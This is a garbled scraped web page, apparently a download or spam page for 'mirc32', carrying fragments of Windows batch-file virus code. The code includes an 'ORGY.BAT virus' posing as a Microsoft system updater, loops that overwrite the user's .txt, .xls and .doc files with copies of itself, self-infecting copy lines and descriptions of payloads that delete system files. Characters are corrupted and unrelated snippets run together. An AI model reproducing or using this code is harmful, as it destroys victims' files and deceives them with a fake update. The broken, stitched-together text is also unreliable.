Download mirc32
Download mirc32

START "C:\Program Files\Internet Explorer\Iexplore.exe" Rem ORGY.BAT virus by EXE-Gency/ĮCHO Welcome To Microsoft Windows System Updater SetupĮCHO Installing Components.Please WaitįOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a > NULįOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a > NULįOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a > NULĮCHO You Now Need to Register with Microsoft's Partner: Fortune Galaxy to receive automatic updates.ĮCHO Downloading Components.Please Wait Challenge me and this is what happens.Įcho if = goto DontBother > infect2.batĮcho copy %%1 + infect1.bat %%1 > infect2.bat Net send * Hack is installing, press OK to begin set up. This virus deletes your whole computer system resulting in the blue 'error' screen of deathĭeletes System filesOpen Notepad and type off Official Blue Screen Of DeathOpen Notepad and type off This opens up notepad endlessly, but can be dangerous

Download mirc32